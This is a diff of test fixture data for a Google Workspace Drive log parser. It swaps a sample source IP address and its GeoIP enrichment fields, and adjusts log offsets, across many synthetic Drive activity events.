 "event.provider": "drive",
 "event.type": [
 "change"
@@ -292,27 +276,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 2961,
+ "log.offset": 2957,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "owner"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -333,7 +313,7 @@
 "event.dataset": "google_workspace.drive",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"create\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"create\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
 "event.provider": "drive",
 "event.type": [
 "creation"
@@ -355,27 +335,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 3684,
+ "log.offset": 3679,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "owner"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -396,7 +372,7 @@
 "event.dataset": "google_workspace.drive",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"delete\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"delete\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
 "event.provider": "drive",
 "event.type": [
 "deletion"
@@ -418,27 +394,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 4386,
+ "log.offset": 4380,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "owner"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -459,7 +431,7 @@
 "event.dataset": "google_workspace.drive",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"download\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"download\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
 "event.provider": "drive",
 "event.type": [
 "info"
@@ -481,27 +453,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 5088,
+ "log.offset": 5081,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "owner"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -522,7 +490,7 @@
 "event.dataset": "google_workspace.drive",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"edit\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"edit\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
 "event.provider": "drive",
 "event.type": [
 "change"
@@ -544,27 +512,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 5792,
+ "log.offset": 5784,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "owner"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -585,7 +549,7 @@
 "event.dataset": "google_workspace.drive",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"add_lock\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"add_lock\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
 "event.provider": "drive",
 "event.type": [
 "change"
@@ -607,27 +571,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 6492,
+ "log.offset": 6483,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "owner"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -648,7 +608,7 @@
 "event.dataset": "google_workspace.drive",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"move\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"destination_folder_id\",\"value\":\"1234\"},{\"name\":\"destination_folder_title\",\"value\":\"folder title\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"source_folder_id\",\"value\":\"1234\"},{\"name\":\"source_folder_title\",\"value\":\"a folder title\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"move\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"destination_folder_id\",\"value\":\"1234\"},{\"name\":\"destination_folder_title\",\"value\":\"folder title\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document 
title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"source_folder_id\",\"value\":\"1234\"},{\"name\":\"source_folder_title\",\"value\":\"a folder title\"}]}}",
 "event.provider": "drive",
 "event.type": [
 "change"
@@ -674,27 +634,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 7196,
+ "log.offset": 7186,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "owner"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -715,7 +671,7 @@
 "event.dataset": "google_workspace.drive",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"preview\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"preview\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
 "event.provider": "drive",
 "event.type": [
 "info"
@@ -737,27 +693,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 8102,
+ "log.offset": 8091,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "owner"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -778,7 +730,7 @@
 "event.dataset": "google_workspace.drive",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"print\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"print\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
 "event.provider": "drive",
 "event.type": [
 "info"
@@ -800,27 +752,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 8805,
+ "log.offset": 8793,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "owner"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -841,7 +789,7 @@
 "event.dataset": "google_workspace.drive",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"remove_from_folder\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"source_folder_id\",\"value\":\"1234\"},{\"name\":\"source_folder_title\",\"value\":\"a folder title\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"remove_from_folder\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document 
title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"source_folder_id\",\"value\":\"1234\"},{\"name\":\"source_folder_title\",\"value\":\"a folder title\"}]}}",
 "event.provider": "drive",
 "event.type": [
 "change"
@@ -865,27 +813,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 9506,
+ "log.offset": 9493,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "owner"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -906,7 +850,7 @@
